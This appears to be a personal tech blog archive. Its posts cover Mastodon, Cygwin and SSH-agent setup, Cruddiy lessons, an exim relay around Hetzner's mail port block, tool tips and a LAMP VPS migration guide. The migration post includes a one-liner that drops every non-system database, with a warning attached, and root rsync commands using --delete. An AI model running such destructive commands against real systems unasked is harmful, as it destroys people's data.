    The idea is brilliantly simple, and it is how the internet is actually supposed to — and always used to — work and it has lots of upsides.

    Upsides

    Instances are run by individuals or groups who set their own rules. And thus every instance has a unique user experience or feel. There are many specific instances with distinct communities.

    There is (theoretically) no real technical limit to the amount of users an instance can have*, but my guess is that most instances will top off somewhere to keep the instance manageable and moderation feasible. Just like most real life communities.

    Because moderation is done per instance (implicitly by rules, explicitly by blocking users), this makes moderation distributed by default and thus scale-able. Did I mention it was clever?

    *I would like to suggest Dunbar's number to the power of two: 22500 users per instance.

    Open

    Mastodon is open. In the realest sense. And I love the open web.

    Everything on Mastodon is open and uses RSS: accounts, hashtags and more all are expressed as RSS feeds. I just love love love that part.

    The openness comes with great upsides:

    There is no ad-driven algorithm.

    Don’t like the moderation rules on your instance? You can move your account to another instance.

    Want to see the source code? Here you go.

    Want to run your own instance? You do you!

    Momentum

    Apart from not really understanding the fediverse, the other reason it didn’t click in 2017 is because no one I knew was there. Kind of important for a social media platform. But this classic chicken-egg problem got a gigantic kickstart with the recent influx as a result of the exodus from that.other.site. And Mastodon finally seems to have hit critical mass: there are enough people to make it interesting, thus attracting even more people. It really has come alive in the last few short weeks.

    There are lots of curious people checking out the new thing, of course time will tell how many will stick around. And compared to other social media sites, the numbers are still really small, but gaining!

    However I would think the end goal of Mastodon should (and is) not necessarily a question of replacing Twitter. Both will most likely co-exist — 44 billion dollar usually doesn’t evaporate just like that. But having Mastodon makes the world that much better, and it gives the users a choice.

    I don’t think it is necessarily that people are fed up with new Twitter leadership (it’s only been a week, right?), but I do believe people are fed up with the Twitter experience in general drawing them to — finally viable — alternatives likes Mastodon.

    And most of these experiences are things that Mastodon implicitly or explicitly addresses. Things like: moderation, accountability, community, ownership and resiliency.

    But I also notice lots of Twitter people — mostly with large followings — are hesitant. I follow quite a few US tech people, and most seem bullish on Musk. Few are not. We’ll see.

    But apart from that there are other challenges.

    Challenges

    Let’s name a few.

    • Usability: Signing on, using Mastodon, understanding the Mastodon/Fediverse idea, finding and adding accounts. It’s not entirely intuitive, and thus a barrier.
    • Performance: call it growth spurts. But most Mastodon instances are suffering greatly at the moment, hindering the user experience.
    • Security: the openness also brings challenges!
    • Twitter: IF (big if) Twitter somehow is able to address some of their issues this would provide a big pull force.

    This all being said the main challenge at this time seems to be:

    • Discoverability: where is everyone, where are interesting accounts, where are the people I know?

    Mastodon needs to do better than sharing spreadsheets for finding interesting accounts. But I do understand that this is the paradox of the open web. Having open, distributed content hinders discoveribilty (also see: podcasts).

    Either way, the distributed character of Mastodon makes it here to stay. The only way is up for the foreseeable future. It’s pretty great to finally have an open, distributed real application, that is not blockchain.

    Eugene Rochko

    I would like to point out something. Mastodon is the project of one person. Started in 2016. Sure lots of people hatched on since, but to me it is indicative.

    Most revolutions start with one person. They might not be the first or their idea might not be original. But timing, the right decisions and right personality are usually what tip the scales in these types of events. Also see: Linus Torvalds.

    It seems Eugene is a true Mensch. Working many hours a week providing great software for a moderate salary (people working on Google ads make 20 times that).

    https://mastodon.social/@Gargron/109260715240000670

    A person with his talent could easily work somewhere else and make more money. But it is obvious he is not in it for the money.

    And it is obvious he has thought longer and more about certain things than most people.

    If you allow the most intolerant voices to be as loud as they want to, you’re going to shut down voices of different opinions as well. So allowing free speech by just allowing all speech is not actually leading to free speech, it just leads to a cesspit of hate.

    Eugen Rochko in Time

    It’s not just the software that makes the difference. It’s the people making the software that do.

  • Using Windows OpenSSH Agent with Windows Terminal and Cygwin

    I am back to running Windows Terminal + Cygwin, after a stint with MobaXterm. I blogged about it before.

    Why:

    • Windows Terminal is pretty good: it doesn’t get in your way, and it’s fast (*very* important).
    • Cygwin gives me access to grep, awk, vim and much more.

    In the end MobaXterm just had too many quirks. Specifically when changing screens — docking / undocking which I do a lot during the day. However, one thing I really did like about MobaXterm was the integrated SSH agent (MobAgent).

    That part worked really well.

    That was what kept me from switching back to Windows Terminal and Cygwin.

    But I recently found out that Windows 10 comes with its own SSH Agent (?!). That was news to me.

    So I now use the Windows SSH Agent. So, not Pageant or OmniSSHAgent or any other Windows SSH Agent or keychain, because these all have issues (I tried them).
    Also running eval $(ssh-agent) for every new terminal window (that zombies when you close your shell) kind of defeats the purpose of having an SSH agent.

    How?

    First you need to tell Windows to start the OpenSSH Authentication Agent on boot:

    PowerShell can tell you if the agent is running:

    Looks good!

    And now comes the tricky part. Using Cygwin AND using this ssh-agent i.e. adding and retrieving keys to and from the agent.

    Of course you can add keys with ssh-add or by adding the -A parameter to the ssh command.

    PS C:\Users\Jan van den Berg> ssh-add.exe .ssh\id_rsa

    But you need to understand this next bit first.

    When invoking ssh in Cygwin you invoke a different ssh client than the default Windows SSH client. One is the Cygwin ssh client, and the other one is the one that comes with Windows. I blogged about this before.

    Spot the differences in this next image:

    These are two different SSH clients

    And here is the secret (that took me way too long to figure out, thanks ssh -v)

    Only when invoking the latter (ssh.exe) you get access to the Windows OpenSSH Agent!

    This is especially tricky when you want to specify identity files. Make sure you use the right paths, the Windows SSH client will look in other default paths. Something to consider.

    My workflow now is as follows: I have defined a couple of bash aliases in my Cygwin .bashrc file so when I fire up Windows Terminal (fast) I can jump to a specified SSH host with one or two keypresses — all the while using the correct SSH keypair with a passphrase I only have to enter once per Windows boot! (edit: I assumed it would be per boot, but it seems the Windows SSH agent holds the keys forever, that may actually be too much of a good thing….).

    alias ms='/cygdrive/c/Windows/System32/OpenSSH/ssh.exe -A -i 'C:\Users\Jan van den Berg\.ssh\mm-id_rsa' jan@myserver'
  • WhatsApp should really fix these issues

    WhatsApp is my most used app, but its development seems stagnant.

    Which is not always a bad thing for software, but WhatsApp could really improve some things, especially when those improvements seem trivial. Some wishes could even be classified as bugs: which they should really fix.

    In no particular order (for iOS).

    • Multi-select on media search
      When you use the global search (pull down on iOS) and select a category (Photos, Documents etc.) you cannot multi-select on the exposed grid. I use this grid for selecting/deleting stuff. But deleting one thing at a time makes the whole experience rather tiresome.
    • Mass delete media types
      In the same vain: give me a button to mass delete gifs. Sure they’re fun, but I don’t need to keep them around. Especially Giphy or Tenor gifs. This probably goes for other media types as well.
    • Search re-index
      When you switch / upgrade your phone and restore a backup, you better pull down on the search bar and enter a search and WAIT for the re-index to finish. Sure I can live with that, but when you forget to do so, you only get to search new chats….(until you switch phones). At least give me a way to kick off the re-index again.
    • More than just starring
      Now I can only star a message. That’s it. I need labels.
    • Move archived chats to somewhere else
      This one is truly baffling. WhatsApp decided to put your archived chats — you know, chats that you don’t need direct access to — at THE TOP OF THE CHATS, and all active and current chats are below the archived chats. Stunning. I accidentally click / tap multiple times per week on these archived chats. Please move them somewhere else.
    • Preview on links!
      What is up with this? This worked fine, then it stopped working, then it worked half, and at the moment when you copy/paste a link, there is no preview. But when someone replies to your link: there is a preview! 🤷‍♂️ Also when you directly post a Twitter URL: no preview. But when sharing the link from the Twitter app to WhatsApp: sure, you get a link preview.
    • More post reactions
      They *finally* added this last week! It keeps chats cleaner and more pleasant. But it seems I can only choose from 5 emojis. I need more!

    I may not be a typical user, my WhatsApp archive dates back 12 years, and is around 40GBs. I sent 166378 messages and received 573376 messages at the time of writing. I keep pruning larger images/videos, but most chats I want to keep, it’s like a diary for me.

    So maybe my wishes go against what WhatsApp wants to be: a very basic, low-entry one-to-many chatapp. But really, I’d happily pay for some of these features, but I guess a pro app is (no not the WhatsApp business app) is out of the question?

  • Reaching 100 stars on GitHub: what I learned from putting code online

    When the pandemic started in early 2020, I needed something to get my mind off things. Frustrated with most database form generation solutions I created Cruddiy and put it on GitHub.

    Two years later Cruddiy reached 100 stars on GitHub. Something which I did not expect.

    We could argue a long time on what a GitHub star as a metric actually represents, but for this post it represents: hey, more than one person had a need for this thing.

    brave_2022-03-24_09-39-06.png (827×161)

    Cruddiy is a small collection of PHP files that you point to your MySQL/MariaDB database and you run it (usually) just once and after a few steps/questions — no coding required — it will generate a set of pretty good looking PHP forms for you — usually one per table. The generated forms have basic CRUD functionality, search, pagination and sorting. The forms are based on Bootstrap and you have seen these forms a million times before. You can use them as they are, or use them as a starting point i.e. scaffolding to further improve on (coding required). And here’s the good part: you can delete Cruddiy when you’re done.

    Cruddiy output

    Simple?

    Most developers reading this will probably now scream say: hey, but you can use framework X or framework Y! And yes, this is true and I have used and done all of that. But I do not like installing a ton of dependencies to generate just a few simple PHP files (which they are): and this is more or less always the case. Read the original post for more background.

    So Cruddiy is my attempt to keep things as simple as possible.

    I am allergic to pulling in lots of files and folders that clutter my system, especially when I don’t know what all these files do. So Cruddiy does not use Composer, Laravel, Symfony, Docker, or other dependencies. Nothing of the sort. It’s just plain PHP files, that generate other PHP files.

    Cruddiy was created to scratch my own itch, and I have used it several times since. But judging by the number of GitHub stars and comments and thank yous I received I think it’s an itch for more people. Part of the reason I put it on GitHub is because I spent more time on it than was probably warranted, and I wanted an excuse to warrant the invested time. Cue famous XKCD comic:

    is_it_worth_the_time_2x.png (1141×927)

    So putting the code on GitHub is a way to shave more time off — other people’s time, but still: time.

    Also another XKCD comic comes to mind:

    automation_2x.png (807×817)
    This one hits close to home.

    Cruddiy is a small project in every sense — in lines of code, number of commits, number of contributors, and number of GitHub stars –, but still, through Cruddiy I experienced the magic of people on the other side of the world, finding and using something I created. The internet is amazing.

    Here are some things that I picked up by putting things out there.

    1. Opinions

    Everyone has one, right? I was excited when I received the first patches from a complete stranger and pulled them in, thinking how amazing this was. However this person was very opinionated how things should work, which bothered me a bit. And he talked to me like I worked for him. But I didn’t pay too much attention to it, I thought maybe this is how it works?

    But when Cruddiy stopped working correctly and had some other weird bugs I removed most of his code and decided: you can fork Cruddiy however you please, but this codebase here is how I want things. And there is absolutely no obligation for me to pull in your code, especially code that fundamentally changes how things work. (It still bothers me a bit that he proposed to move the code to a different folder. I might still revert this).

    It was a hard lesson because I had already developed a bit more based on his code so reverting wasn’t very straightforward and involved some Git tricks that I never want to use again.

    I still find it weird, that I just blindly trusted someone and his opinion purely because I was so surprised that other people had an actual use for Cruddiy. But if I had kept at it Cruddiy would have probably withered (being broken and all) and ended up being unusable.

    One of the key takeaways here is: something might be open source but you still need people to take care of it e.g. make important decisions for it, it will not survive on its own because there are too many opinions out there. And preferably that person should be you. This is true for arguably the biggest distributed software project in the world — Linux — right down to a very small project like Cruddiy.

    That being said, the above example was of someone being opinionated i.e. rude. But a lot of people seem to have a strange way of asking for things. Please spend some of your valuable time fixing this and that for me, kthxbye.

    Great ideas! But maybe send a PR?

    2. Audience

    Judging by the level of questions and requests I receive, I noticed the average Cruddiy user isn’t a computer programmer.

    And this is expected, since Cruddiy is a no-code solution.

    I do however find it somewhat baffling that there are people who find their way around GitHub without either having a decent understanding of code or Git/GitHub.

    Case in point: I had contact with someone who had good ideas — and who sent me actual codepatches, which I merged. But this person did not know how to use git or GitHub. Which is … surprising, to say the least!

    This person also asked if I had a Discord server (!?) which he found easier to communicate by than e-mail.

    This tells me a couple of things:

    1. GitHub is much more than a code sharing site, it’s also where people go for solutions sans Google.
    2. There is still so much to win for GitHub, it’s not simple enough yet. Make it simpler to use and more people will use it.
    3. Discord is successfully replacing e-mail for some people.

    3. Licensing

    I started Cruddiy under GPL2, because, well why not? Lots of projects use GPL2.

    However I did some reading and switched to AGPL-3.0 License, I think it is important to share changes. However: I was and am still not sure if Cruddiy fits the AGPL bill: is it really a networked piece of code (isn’t everything on GitHub in a sense a piece of networked code)?

    I am no license expert, and might be wrong about this interpretation but I see AGPL-3.0 as GPL3.0 with an add-on.

    The lesson is: think about what license your code should have before putting it out it online.

    4. Releases

    This was one of the more surprising learnings. Usually when I pull code myself from GitHub I always look for the latest commit. But this is not normal?

    Early on I created some tags and based one or two releases on these tags. Just to play around with tags and releases. It wasn’t until later when a user had some weird errors that I found he was using a very old release. Why? Because it was the only release available and that is were people look! Duh…

    So now I make it a habit to tag commits and release the tag.

    5. GitHub quirks

    There are two:

    1. This is a possible GitHub caching thing, but I noticed I always get a flurry of stars, then weeks nothing, then again a flurry of stars. Nothing particular about this, just strange behavior that might have something to do with caching.
    2. I have NO idea how people find Cruddiy: there is no Google analytics. Do they find my blog first and then GitHub or the other way around? I would have like a bit more insight into this.

    6. Energy

    Most of the work I put in Cruddiy was at the start (a good chunk of my evenings for a couple of weeks). The project is still only 60 commits old (again; very small). There are many more ideas Cruddiy *could* do, but which *I* don’t need now. So this means things stay mostly as they are.

    I notice when people point out bugs: I am driven to fix these. But pro-actively sitting down and adding new features is not something I do. I maybe could, but I don’t. I need a real use-case for it. Last week I added a navbar solution, which greatly improves the visual of Cruddiy, but this was only because someone showed me he hacked a navbar on top of Cruddiy, which drove me to incorporate it in Cruddiy that same evening.

    7. Looking at your own code

    I am not a professional developer. That is not my day job. So most software projects I embark on are either small or ephemeral. Cruddiy however has forced me to look at code that I wrote up to two years ago, and yes everything they say about writing clear code is true. Here is what I found:

    1. Don’t try to be clever, first and foremost: make it clear. So future you might understand what it is you were trying to do.
    2. Write code as if you’re explaining to someone else (again: that someone else is future you).
    3. Don’t think you don’t need to comment code because it makes sense by itself: comment code!
    4. Less lines of code is not always better. Do not trade clearness for conciseness.

    Putting code out there

    I do not feel obliged (anymore) to adhere to every wish out there. But I do want things to work as I promised. So I have to admit it also gives me a bit of anxiety when people have errors or bugs and I can’t take over their keyboard, I have to guess at their config/setup, which bothers me a bit. Just as it bothers me when I try and help people and never hear from them again.

    Also I don’t think I have become a better developer, if anything it may have been detrimental to my skills: since wanting to fix things quickly doesn’t necessarily produce the best code.

    But these are all minor inconveniences. They do not weigh up to the sheer enjoyment I get from the idea that someone, somewhere out there is using something I made to help solve a problem.

    So if you have the choice: put your code out there!

  • Windows Terminal + Cygwin

    [UPDATE July 2022: I switched to using MobaXterm which does the job just fine. I don’t like that it is not free/open but I do like that it comes with an integrated SSH agent, which makes life a lot easier]

    I had been a happy WSL1 user for many years, but after switching laptops I more or less had to upgrade to WSL2. Which is the same thing but not really.

    The thing is, WSL2 startup times are annoyingly slow. And I hate slow. Computers have to be fast and snappy.

    So after poking around — many blogs and Github issues — I decided to ditch WSL and move on.

    So I entered the world of terminal emulators and unixy environments, which can be overwhelmingly confusing at times.

    Windows Terminal

    First I settled on Windows Terminal as a terminal emulator. I already starting using this for WSL (which comes default with MinTTY).

    MinTTY is used *a lot* and many tools are actually MinTTY under the hood. Cygwin also comes with MinTTY by default. And MinTTY is pretty good, however: it has no tabs.

    Windows Terminal is the only terminal emulator I found (on Windows) that does tabs decently! The only other ones I found were ConEmu, but it feels a bit less snappy, and cmder (which uses ConEmu so it has the same problem).

    Once you have tabs, you don’t want to go back.

    Windows Terminal is a native Windows binary, so that might explain that snappy feel.

    So Windows Terminal it is.

    But now, how do I get that Linux feel on Windows! WSL1 was pretty perfect, an almost native feeling Linux environment.

    There are many alternatives and emulation option (like running VirtualBox or MinGW et al.) but why not go with good, old, trusty Cygwin solution. Their tagline is enticing:

    Get that Linux feeling – on Windows

    That sounds good!

    Cygwin

    I knew Cygwin from way back, and I noticed it still hasn’t changed its logical, but somewhat archaic installation procedure.

    Cygwin installs itself in a folder with a bunch of recompiled for Windows GPL tools, to create a hierarchy that LOOKS and FEELS like a Linux environment.

    Fine, whatever.

    As long as I can use, grep, rsync, ssh, wget, vim and awk, right?

    And I can. Cygwin makes a whole lot of recompiled GNU tools available for Windows — including the above.

    However a basic Cygwin installation is pretty minimalistic, so I had to run the installer a few times to get all the software packages I needed (like ssh, vim and wget they are not installed by default). This makes Cygwin a bit different: you can — and usually have to — run the installer a few times to get everything you need.

    Next I added Cygwin to my Windows Terminal and made it the default. And with ‘added’ I mean I made a Windows Terminal profile that starts the bash.exe program that comes with Cygwin and drops me in the Cygin homedir (which is actually a Windows path).

    A terminal emulator in itself does nothing except handle input / output, and running a shell program like bash enables you to interact with your files (or OS) by sending input signals trough a terminal emulator and processing its output signals.

    Cygwin comes with MinTTY by default (of course): if this had (decent) tabs, I’d probably chuck Windows Terminal.

    In Windows Terminal you can click a profile together, which edits a JSON file, but you can also directly edit the JSON if you know what you are doing.

    brave_2022-01-05_13-21-05.png (710×744)
    Windows Terminal: setting Cygwin

    Improvements

    I think I really like that Cygwin keeps everything in one folder and doesn’t mess too much with my Windows installation, or path settings and all that. I think (?) it’s just a folder (pretty portable).

    Two things though.

    Prompt

    Cygwin needs a better looking prompt. Well here you go:

    export PS1="\u@\h:[\e[1;32m]\w \e[m \D{%T}# "

    Try it, you’ll like it. Colors, path, username, time, it has everthing! Put it in your .bash_rc

    SSH

    I could not figure out why my SSH keys weren’t working when connecting to my server. But when I dropped into verbose mode (ssh -vv) I saw ssh wanted to use keys from C:\Users\Jan van den Berg\.ssh instead of the Cygwin homedir /home/jan/.ssh

    I spent waaaaay too much timing thinking why Cygwin would do this, until I noticed the SSH binary I invoked was the default Windows 10 OpenSSH client, which will default to looking in the Windows homedir for ssh keys instead of the Cygwin homedir.

    So you have to specifically invoke /bin/ssh (or you can remove the Windows OpenSSH client, or change symlinks, or change paths, whatever works for you).

    WindowsTerminal_2022-01-05_19-21-35.png (1011×149)
    Spot the difference, on of these is not like the other.

    The lesson is: be aware that Cygwin is just a bunch of Windows executables, and it will therefore also look in your Windows path.

    explorer_2022-01-05_16-32-42.png (693×404)
    Just files

    Conclusion

    I think I am pretty happy with this setup, mainly because it starts almost instantly! And that was the whole point.

  • Bypassing Hetzner mail port block (port 25/465)

    I recently switched my VPS from Linode to Hetzner. I got more CPU, RAM and storage for less money. Pretty good right?

    However it wasn’t after I migrated that I found out Hetzner blocks all outgoing port 25 and 465 traffic.

    At least; for the first month for new customers.

    This means my new server cannot talk SMTP with the rest of the world i.e. my server cannot send mail!

    (Note: you can however connect to mailservers that listen on port 587).

    I can see why they would do this, however this is less than ideal if you have a production server with a couple of webshops.

    So, now what?

    My server cannot send mail itself but it can also not connect to a smarthost (a different server that does the mail sending), because smarthosts are typically also on port 25/465.

    I do however have a Raspberry Pi in my home network. What if I run a mail server on a different port there, say 2500?

    So, my VPS can relay the mail there. But I don’t want my Pi to be connected to the internet and send mail. So then what? Why not relay from the Pi to an actual smarthost. Which smarthost? Well my ISP offers authenticated SMTP so I can relay mail from my VPS to my Pi and from my Pi to my ISP. And my ISP can send the mail to anywhere.

    This could work.

    The setup

    This is what it looks like.

    There are two mail server configurations in place. I use exim4 on Debian and you can easily run dpkg-reconfigure exim4-config to (re)create a valid Exim config.

    This command will (re)create a file which holds all specific Exim configuration: /etc/exim4/update-exim4.conf.conf

    It’s a small and easy to understand file. Here follow the complete contents of both files, for reference.

    Hetzner VPS exim4 config

    dc_eximconfig_configtype='satellite'
    dc_other_hostnames='topicalcovers.com;brug.info;piks.nl;j11g.com;posthistorie.nl;server.j11g.com'
    dc_local_interfaces='157.90.24.20'
    dc_readhost=''
    dc_relay_domains=''
    dc_minimaldns='false'
    dc_relay_nets=''
    dc_smarthost='212.84.154.148::2500'
    CFILEMODE='644'
    dc_use_split_config='false'
    dc_hide_mailname='false'
    dc_mailname_in_oh='true'
    dc_localdelivery='mail_spool'

    Note: use a double semi-colon to specify a mailserver that listens on a different port.

    Raspberry Pi exim4 config

    dc_eximconfig_configtype='smarthost'
    dc_other_hostnames=''
    dc_local_interfaces='192.168.178.135'
    dc_readhost=''
    dc_relay_domains='posthistorie.nl,topicalcovers.com,piks.nl,j11g.com,server.j11g.com,willempasterkamp.nl'
    dc_minimaldns='false'
    dc_relay_nets='157.90.24.20'
    dc_smarthost='mail.solcon.nl'
    CFILEMODE='644'
    dc_use_split_config='false'
    dc_hide_mailname='false'
    dc_mailname_in_oh='true'
    dc_localdelivery='mail_spool'

    For this to work you also need to edit your file /etc/exim4/passwd.client with the a valid mailboxname and password:

    mail.solcon.nl:authorizedmailboxname:pa$$word

    Or use an asterisk ( * ) to use the credentials for every mailserver. If you (only) use a smarthost, this is fine.

    SPF records

    The above configs are what you need to do on your Hetzner VPS and your Pi. Next, you need to change your SPF records.

    The SPF records tell the receiving mailserver that the sending mailserver is allowed to relay/send mail for a specific domain.

    As you can tell I have multiple domains, so that means editting multiple SPF records. Here is what one SPF records looks like. This is public information, anyone can (and should) look up your domain SPF records.

    This is the raw SPF record:

    v=spf1 mx ip4:212.84.154.148 ip4:157.90.24.20 ip4:212.45.32.0/24 ip6:2001:9e0:8606:8f00::1 ip6:2a01:7e01::f03c:91ff:fe02:b21b ip6:2001:9e0:4:32::107 ip6:2001:9e0:4:32::108 ip6:2a01:4f8:1c1c:79a1::1 ~all

    You can see it’s a mix of IPv4 and IPv6. For readability, the next image is what it actually says.

    MX – All mail for this domain should be send TO a specific IPv4 or IPv6 address.

    Next: you can see which IPv4 and IPv6 addresses are allowed to send mail for this domain. So where mail is accepted FROM.

    So if my VPS wants to send a mail to @gmail.com it will relay the mail to my Pi, which will happily accept the mail, and will relay it to my ISP mail server, and my ISP mail server will try to deliver the mail to Google Mail. Google Mail however will CHECK if the IP address for my ISP mail server MATCHES the SPF records. If Google finds that the IP addresses from my ISP mail servers are not in the SPF records, it will not accept the mail. But if they match, Google Mail will accept the mail.

  • Ten 2022 Tool Tips

    Ten 2022 Tool Tips

    Here’s a list of software tools I either started using this year or tools I think everyone should be using.

    Bitwarden

    ea6441be.png (426×270)

    The best password manager. Free if you like, or only $10 per year if you want to have a little bit more features or just want to support the project.
    My advice: pay the $10, Bitwarden is the best bargain for a great password manager and you support development of new features. It has good browser integration and a slick iOS app and even a CLI interface.

    My passwords are safer because of Bitwarden.

    Brave Browser

    e55efdeb.png (880×270)

    I started using Brave this year after listening to this. Sure you can rack up crypto (Brave Attention Tokens), but I mostly use it because I don’t like being too tied to Google, but I actually do like Chrome. The great thing is, that Brave is Chrome under the hood: so I can have my Chrome extensions! Also Brave has bookmark sync across devices, I need that too (most other Chromium based browsers don’t have that).

    QR Codes

    Don’t call it a comeback.

    QR code for this URL

    QR codes have been around for years, and I’ve always wondered what their use case for personal use might be. Well, that became abundantly clear the last year or so.

    It turned out there is a use case for friction less, touch less, platform independent data transmission. Who knew?

    ShareX

    ShareX_Screenshot.png (846×503)

    Most people know how to take a screenshot, but ShareX is what you really need: it is excellent!

    I set it up, that with two clicks I can take a screenshot and upload it directly to my server and ShareX puts the newly created URL and the image itself under my paste button (so if I paste to a textbox I get the URL string, if I paste to say a blogpost I’m editting I get the image). Amazing. I use this tool a lot. Looking at my screenshot folder I have taken around 1277 screenshots this year.

    WindowsTerminal_2021-12-16_17-47-10.png (1243×202)

    Node screenshot

    One thing however, I have not figured out — yet — in ShareX is how to take screenshots from scrolling (large vertical) pages. I recently learned how to do this. Open the inspector, select a node and take a screenshot. I’ve been using it more than I expected.

    brave_2021-12-16_17-48-47.png (1919×2015)
    Yes, *this* screenshot was done with ShareX.

    Windows Terminal

    In 2021 I switched from WSL Terminal to Windows Terminal. It has tabs and better zoom scroll support.

    Video speed controller

    Please everyone. Install this extension. I watch a lot of talks online, but most people tend to talk slowly: not anymore with this extension! It will speed up any video content. You can use the mouse menu or with the s/d keys to speed up or slow down videos.

    5723e6ae-0c41-11e7-820c-1d8e814a2888.png (640×400)
    Ain’t nobody got time for this!

    RSS

    Ngl, I strongly believe RSS is the embodiment of how the web should work. An open, platform independent protocol to share information.

    I deeply love RSS.

    As a matter of fact: if your technology does not support RSS, you may be hostile to the open web.

    This is how I experience the web (FreshRSS). Screenshot from today.

    WordPress

    I love, love, love WordPress and I have been using it since 2005. This site runs WordPress, as does my other blog on which I blog daily.

    I’ve published close to 100 blogs this year with WordPress. It never fails.

    When people talk about the features of web3: being something decentralized and where anyone can publish, I think: WordPress! The future is already here.

    Cruddiy/Corbin

    Shameless plug.

    When the pandemic started, I created Cruddiy. At the moment this two dimensional array battering piece of PHP code has undergone many revisions, has 80+ stars on GitHub and received many thank you’s and even a couple of contributions. It’s fun.

    Cruddiy is a code generator, and it does a lot of maybe hard to follow things, but the code it generates is as clean as it comes.

    If you have a MySQL/MariaDB database, Cruddiy enables you to create forms like this, in seconds, without any programming:

    Last month I created Corbin. Which has also been a lot of fun and useful for easily creating self-hosted image albums. A single PHP script, that again — like Cruddiy — generates a clean and portable HTML file. Maybe I should think about creating a generator generator 🤔.

    That’s my list. I am always curious to know your tool tips! Share them in the comment box below.

  • Migrating a LAMP VPS

    I recently switched my LAMP virtual server to a different VPS provider.

    The LAMP server that is serving you this site. So the migration worked!

    Here are the steps, for future reference. Mostly for myself, but maybe you — someone who came here from Google — can use this too. This should work on any small to medium sized VPS.

    Let’s go!

    Lower your DNS records TTL value

    When you switch to a new VPS, you will get a new IP address (probably two: IPv4 an IPv6). And you probably have one or more domain names, that point to that IP. Those records will have to be changed for a successful migration.

    You need to prepare your DNS TTL.

    To do this, set your DNS TTL to one minute (60 seconds), so when you make the switch, your DNS change will be propagated swiftly. Don’t change this right before the switch of course, it will have no effect. Change it at least 48 hours in advance of the change.

    Set up a new VPS with the same OS

    Don’t go from Ubuntu to Debian or vice-versa if you don’t want any headaches. Go from Debian 10 to Debian 10. Or CentOS 8 to CentOS 8. Or what have you.

    This blog focusses on Debian.

    Install all your packages: Apache, MySQL, PHP and what else you need.

    My advice is to use the package configs! Do not try to to copy over package settings from the old server, except where it matters, more on that later.

    This starts you fresh.

    PHP

    Just install PHP from package. Maybe if you have specific php.ini settings change those, otherwise you should be good to go. Most Debian packages are fine out of the box for a VPS.

    I needed the following extra packages:

    apt-get install php7.4-gd php7.4-imagick php7.4-mbstring php7.4-xml php7.4-bz2 php7.4-zip php7.4-curl php7.4-mysql php-twig

    MySQL/MariaDB

    apt-get install mariadb-server

    Run this after a fresh MariaDB installation

    /usr/bin/mysql_secure_installation

    Now you have a clean (and somewhat secure) MariaDB server, with no databases (except the default ones).

    On the old server you want to use the following tool to export MySQL/MariaDB user accounts and their privileges. Later we will will export and import all databases. But that is just data. This tool is the preferred way to deal with the export and import of user accounts:

    pt-show-grants

    This generates a bunch of GRANT queries that you can run on the new server. Run this on the new server (or clean them up first if you need to, delete old users etc.). So that after you import the databases, all the database user rights will be correct.

    Set this on the old server, it helps for processing later.

    SET GLOBAL innodb_fast_shutdown=0

    Rsync all the things

    This is probably the most time consuming step, my advice is to do it once to get a full initial backup, and once more right before the change to get the latest changes: which will be way faster. Rsync is the perfect tool for this, because it is smart enough to only sync changes.

    Make sure the new server can connect via SSH (as root) to the old server: my advice is to deploy the SSH keys (you should know how this works, otherwise you have no business reading this post ;)).

    With that in place you can run rsync without password prompts.

    My rsync script looks like this, your files and locations may be different of course.

    Some folders I rsync to where I want them (e.g. /var/log/apache) others I put them in a backup dir for reference and manual copying later (e.g. the complete /etc dir).

    #Sync all necessary files.
    #Homedir skip .ssh directories!
    rsync -havzP --delete --stats --exclude '.ssh' root@139.162.180.162:/home/jan/ /home/jan/
    #root home
    rsync -havzP --delete --stats --exclude '.ssh' root@139.162.180.162:/root/ /root/
    #Critical files
    rsync -havzP --delete --stats root@139.162.180.162:/var/lib/prosody/ /home/backup/server.piks.nl/var/lib/prosody
    rsync -havzP --delete --stats root@139.162.180.162:/var/spool/cron/crontabs /home/backup/server.piks.nl/var/spool/cron/crontabs 
    #I want my webserver logs
    rsync -havzP --delete --stats root@139.162.180.162:/var/log/apache2/ /var/log/apache2/
    #Here are most of your config files. Put them somewhere safe for reference
    rsync -havzP --delete --stats root@139.162.180.162:/etc/ /home/backup/server.piks.nl/etc/
    #Most important folder
    rsync -havzP --delete --stats root@139.162.180.162:/var/www/ /var/www/

    You run this ON the new server and PULL in all relevant data FROM the old server.

    The trick is to put this script NOT in /home/jan or /root or any of the other folders that you rsync because they get be overwritten by rsync.

    Another trick is to NOT copy your .ssh directories. It is bad practice and can really mess things up, since rsync uses SSH to connect. Keep the old and new SSH accounts separated! Use different password and/or SSH keys for the old and the new server.

    Apache

    If you installed from package, Apache should be up and running already.

    Extra modules I had to enable:

    a2enmod rewrite socache_shmcb ssl authz_groupfile vhost_alias

    These modules are not enabled by default, but I find most webservers need them.

    Also on Debian Apache you have to edit charset.conf and uncomment the following line:

    AddDefaultCharset UTF-8

    After that you’re good to go and can just copy over your /etc/apache2/sites-available and /etc/apache2/sites-enabled directories from your rsynced folder and you should be good to go.

    If you use certbot, no problem: just copy /etc/letsencrypt over to your new server (from the rsync dump). This will work. They’re just files.

    But for certbot to run you need to install certbot of course AND finish the migration (change the DNS). Otherwise certbot renewals will fail.

    Entering the point of no return

    Everything so far was prelude. You now have (most of) your data, a working Apache config with PHP, and an empty database server.

    Now the real migration starts.

    When you have prepared everything as described here above, the actual migration (aka the following steps) should take no more than 10 minutes.

    • Stop cron on the old server

    You don’t want cron to start doing things in the middle of a migration.

    • Stop most things — except SSH and MariaDB/MySQL server — on the old server
    • Dump the database on the old server

    The following one-liner dumps all relevant databases to a SINGLE SQL file (I like it that way):

    time echo 'show databases;' | mysql -uroot -pPA$$WORD | grep -v Database| grep -v ^information_schema$ | grep -v ^mysql$ |grep -v ^performance_schema$| xargs mysqldump -uroot -pPA$$WORD --databases > all.sql

    You run this right before the migration. After you have shut down everything on the old server (except the MariaDB server). This will dump all NON MariaDB specific databases (i.e. YOUR databases). The other tables: information_schema, performance_schema and mysql: don’t mess with those. The new installation has created those already for you.

    If you want to try and export and import before migration, the following one-liner drops all databases again (except the default ones) so you can start fresh again. This can be handy. Of course DO NOT RUN THIS ON YOUR OLD SERVER. It will drop all databases. Be very, very careful with this one-liner.

    mysql -uroot -pPA$$WORD -e "show databases" | grep -v Database | grep -v mysql| grep -v information_schema| gawk '{print "drop database " $1 ";select sleep(0.1);"}' | mysql -uroot -pPA$$WORD

    • Run the rsync again

    Rsync everything (including) your freshly dumped all.sql file. This rsync will be way faster, since only the changes since the last rsync will be synced. Next: import the dump in the new server

    mysql -u root -p < /home/whereveryouhaveputhisfile/all.sql

    You now have a working Apache server and a working MariaDB server with all your data.

